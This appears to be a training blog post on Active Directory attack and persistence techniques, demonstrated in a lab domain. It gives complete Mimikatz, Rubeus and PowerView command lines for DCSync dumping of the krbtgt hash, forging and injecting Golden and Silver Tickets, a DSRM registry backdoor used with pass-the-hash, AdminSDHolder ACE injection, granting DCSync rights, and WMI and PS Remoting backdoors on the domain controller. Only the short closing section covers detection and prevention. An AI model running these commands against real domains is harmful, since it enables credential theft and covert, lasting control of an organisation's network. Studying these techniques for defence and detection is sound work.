Golden & Silver Tickets, DCSync & AD Persistence — DSRM, AdminSDHolder, Security Descriptors

1. DCSync — Extracting the krbtgt Hash

The krbtgt account is the key to the kingdom. Its NTLM hash is used to encrypt and sign every Kerberos TGT issued in the domain. With it, you can forge TGTs for any user, with any group membership, with any lifetime — completely offline, without touching the DC again. DCSync is the cleanest way to get it.

# Extract the krbtgt hash via DCSync (requires DA or replication rights)
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit

# Key values to note from the output:
SAM Username         : krbtgt
Object Security ID   : S-1-5-21-719815819-3726368948-3917688648-502
Credentials:
  Hash NTLM          : 4e9a25a62b7b4c8c2b6e11f3a9d0e9a2

# Also grab the domain SID (needed for ticket forging):
PS C:\AD\Tools> Get-DomainSID
S-1-5-21-719815819-3726368948-3917688648

# Get the Administrator hash too while you're here
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit

Save these values securely: krbtgt NTLM hash + domain SID. These two values together let you forge a Golden Ticket at any time in the future — even after all passwords are reset — as long as the krbtgt password hasn't been rotated twice.

2. Golden Ticket — Forging a Universal TGT

A Golden Ticket is a forged Kerberos TGT. Because TGTs are encrypted with the krbtgt hash, and you now have that hash, you can create a valid TGT for any user — including a non-existent user — with any group memberships, including Domain Admins and Enterprise Admins. The DC trusts it completely because the signature is valid.

What makes it "golden": Normal TGTs expire in 10 hours and can be renewed for up to 7 days. A forged Golden Ticket can be set to expire in 10 years. It also bypasses smartcard requirements and any account restrictions — the DC only checks the cryptographic signature, which is valid because you used the real krbtgt hash.

2.1 Forging and Injecting a Golden Ticket

# Forge a Golden Ticket for masaaki_admin (or any username — even fake ones)
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /krbtgt:4e9a25a62b7b4c8c2b6e11f3a9d0e9a2 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit

# Parameters explained:
# /User      — username in the ticket (can be anything, even fake)
# /domain    — FQDN of the domain
# /sid       — domain SID (without the last RID)
# /krbtgt    — the krbtgt NTLM hash
# /id        — RID of the user (500 = Administrator)
# /groups    — group RIDs (512=Domain Admins, 519=Enterprise Admins, 520=Group Policy Creator)
# /ptt       — inject the ticket into the current session immediately
# /endin     — ticket validity in minutes (600 = 10 hours, normal value)
# /renewmax  — max renewal time in minutes

# Verify the ticket is loaded
PS C:\AD\Tools> klist

# Access any resource in the domain
PS C:\AD\Tools> dir \\masaaki-dc\C$
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\Administrator" exit

2.2 Saving the Ticket to File for Later Use

# Save the Golden Ticket to a .kirbi file instead of injecting immediately
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /krbtgt:4e9a25a62b7b4c8c2b6e11f3a9d0e9a2 /ticket:golden.kirbi" exit

# Inject the saved ticket later
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::ptt golden.kirbi" exit

# Or use Rubeus to inject
C:\AD\Tools> .\Rubeus.exe ptt /ticket:golden.kirbi

3. Silver Ticket — Forging a Service Ticket

A Silver Ticket is a forged TGS (service ticket) for a specific service. Unlike Golden Tickets it doesn't use the krbtgt hash — it uses the service account's NTLM hash. The key difference: Silver Tickets are not validated by the DC at all — the service itself decrypts the ticket with its own password hash and trusts it. This makes Silver Tickets stealthier — no KDC interaction after the initial ticket creation.

CIFS / SMB

Forge a CIFS ticket for a server using the machine account hash. Grants file system access to the target without interacting with the DC.

HOST

Forge a HOST ticket for scheduled task access on a remote machine. Useful for persistence — create a scheduled task on any server.

LDAP

Forge an LDAP ticket for the DC's machine account. Grants DCSync rights without needing DA — useful for stealthy replication.

WSMAN / HTTP

Forge a WSMAN ticket for WinRM access. Grants PS Remoting access to a machine using the machine account hash.

# Forge a CIFS Silver Ticket for masaaki-dc using the DC machine account hash
PS C:\AD\Tools> .\Mimikatz.exe "kerberos::golden /User:masaaki_admin /domain:masaaki-corp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:masaaki-dc.masaaki-corp.local /service:cifs /rc4:a8b2c1d3e4f5a6b7c8d9e0f1a2b3c4d5 /ptt" exit

# /target — the machine the service runs on
# /service — the service type (cifs, host, http, ldap, wsman)
# /rc4     — machine account NTLM hash (from DCSync or sekurlsa::logonpasswords)
# /ptt     — inject immediately

# Verify access to the DC's file system (no DC interaction — pure Silver Ticket)
PS C:\AD\Tools> dir \\masaaki-dc\C$

4. DSRM Backdoor — Local Admin on the DC via Restore Mode

Every Domain Controller has a DSRM (Directory Services Restore Mode) administrator account — a local admin account used for AD recovery that exists entirely outside of domain authentication. Its password is set during DC promotion and almost never changed. By dumping this hash and enabling DSRM logon over the network, you get a persistent local admin backdoor on every DC that survives domain-wide password resets.

4.1 Extracting the DSRM Hash

# Connect to the DC (requires DA access)
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc

# Dump the DSRM credentials from the DC's SAM database
PS [masaaki-dc]: C:\AD\Tools> .\Mimikatz.exe "token::elevate" "lsadump::sam" exit

# Look for the Administrator account in the output:
SAMKey : ...
User : Administrator
  Hash NTLM: f4c2b1a0d3e5f6a7b8c9d0e1f2a3b4c5  ← this is the DSRM hash

4.2 Enabling DSRM Network Logon (Persistence)

By default, the DSRM account can only log in when the DC is in restore mode. A registry change enables it for normal network logons too.

# On the DC — enable DSRM logon over the network
PS [masaaki-dc]: C:\AD\Tools> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

# Value 2 = DSRM account can log in at all times (not just during restore mode)
# This setting survives reboots and is NOT removed by domain password resets

# From your attack machine — Pass-the-Hash using the DSRM hash
PS C:\AD\Tools> .\Mimikatz.exe "sekurlsa::pth /domain:masaaki-dc /user:Administrator /ntlm:f4c2b1a0d3e5f6a7b8c9d0e1f2a3b4c5 /run:powershell.exe" exit

# Note: use the NetBIOS name (masaaki-dc), not the FQDN — DSRM is a local account
# Access the DC file system
PS C:\AD\Tools> dir \\masaaki-dc\C$

Why this is powerful: The DSRM password is almost never rotated. Even if the entire domain's passwords are reset (incident response scenario), the DSRM hash still works. This backdoor is extremely persistent and hard to detect — most organisations don't monitor DSRM account activity.

5. AdminSDHolder — Injecting Persistent ACEs on All Protected Objects

AdminSDHolder is an AD object at CN=AdminSDHolder,CN=System,DC=masaaki-corp,DC=local. Every hour, a background process called SDProp runs on the DC and copies the AdminSDHolder's ACL to all protected objects (Domain Admins, Enterprise Admins, Administrators, Schema Admins, etc.). By adding an ACE to AdminSDHolder, you ensure that ACE propagates to every privileged group in the domain within an hour — and re-applies every hour thereafter.

# Add GenericAll for masaaki on AdminSDHolder
# Within 60 minutes, masaaki gets GenericAll on all protected groups and users
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=masaaki-corp,DC=local" -PrincipalIdentity masaaki -Rights All -Verbose

# Trigger SDProp immediately (don't wait 60 minutes)
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose

# Verify — masaaki now has GenericAll on Domain Admins
PS C:\AD\Tools> Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReferenceName -match "masaaki"}

# Now use it — add masaaki to Domain Admins
PS C:\AD\Tools> Add-DomainGroupMember -Identity "Domain Admins" -Members masaaki -Verbose

Why this persists: Even if an admin notices and removes the ACE from Domain Admins, SDProp re-adds it from AdminSDHolder within 60 minutes. You need to remove the ACE from AdminSDHolder itself to stop the propagation. Most incident responders check the group's ACL, not AdminSDHolder.

6. DCSync Rights Delegation — Giving Any Account Replication Power

Grant a low-privilege user DCSync rights on the domain object. They can then dump any hash at any time, even without DA rights. Covered in detail in Blog 1 (WriteDACL abuse), but worth noting here as a persistence mechanism.

# Grant masaaki DCSync rights on the domain object
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity "DC=masaaki-corp,DC=local" -PrincipalIdentity masaaki -Rights DCSync -Verbose

# Later — masaaki can run DCSync without being in Domain Admins
PS C:\AD\Tools> .\Mimikatz.exe "lsadump::dcsync /user:masaaki-corp\krbtgt" exit

# Verify rights were granted
PS C:\AD\Tools> Get-DomainObjectAcl "DC=masaaki-corp,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -and ($_.IdentityReferenceName -match 'masaaki')}

7. Security Descriptor Persistence — WMI & PS Remoting Backdoors

Modify the security descriptors on WMI namespaces and PS Remoting (WinRM) on the DC to grant your low-priv account access. This means even if your DA is removed, you can still connect to the DC using a normal-looking domain user — no elevated privileges required.

7.1 PS Remoting Backdoor on the DC

# On the DC — grant masaaki PS Remoting access (no DA needed after this)
PS [masaaki-dc]: C:\AD\Tools> Set-RemotePSRemoting -UserName masaaki-corp\masaaki -ComputerName masaaki-dc -Verbose

# From your machine — masaaki can now PS Remote to the DC without DA
PS C:\AD\Tools> Enter-PSSession -ComputerName masaaki-dc.masaaki-corp.local
PS [masaaki-dc]: C:\Users\masaaki> whoami
masaaki-corp\masaaki

7.2 WMI Backdoor — Remote Command Execution on the DC

# On the DC — modify WMI namespace security to grant masaaki access
PS [masaaki-dc]: C:\AD\Tools> . .\DAMP.ps1
PS [masaaki-dc]: C:\AD\Tools> Add-RemoteWMIAccess -UserName masaaki-corp\masaaki -ComputerName masaaki-dc -Verbose

# From your machine — masaaki can now execute commands on the DC via WMI
PS C:\AD\Tools> Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "cmd.exe /c whoami > C:\Temp\out.txt" -ComputerName masaaki-dc -Credential masaaki-corp\masaaki

# Retrieve the output
PS C:\AD\Tools> Get-Content \\masaaki-dc\C$\Temp\out.txt

Why these persist: WMI namespace ACLs and PS Remoting security descriptors are not reset when domain group memberships change. They live at the machine configuration level — not in AD. Only explicitly auditing and removing these ACL modifications will clean them up.

8. Prevention & Detection

Rotate krbtgt Password Twice

After any suspected compromise, rotate the krbtgt password twice with a 10-hour gap between rotations. This invalidates all existing Golden Tickets. Single rotation is not sufficient — the old hash is still cached for one ticket lifetime.

Monitor DCSync Events

Alert on event 4662 from non-DC sources with replication object types. No user account should ever trigger a replication event — only other DCs should.

Audit AdminSDHolder ACL

Include AdminSDHolder in regular ACL audits. Any non-default ACE here is a persistence mechanism. Run quarterly reviews or alert on 5136 (AD Object Modification) events targeting AdminSDHolder.

Monitor DSRM Registry Key

Alert if HKLM\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior is set to anything other than 0 on any DC. This should never change in normal operations.

Change DSRM Password Regularly

Rotate DSRM passwords on all DCs at least annually using ntdsutil set dsrm password. Include this in your DC maintenance runbook.

Detect Anomalous Kerberos Tickets

Alert on Kerberos tickets with lifetimes > 10 hours or SIDs that don't match existing accounts. Golden Tickets often use non-existent or renamed account SIDs that stand out in event logs.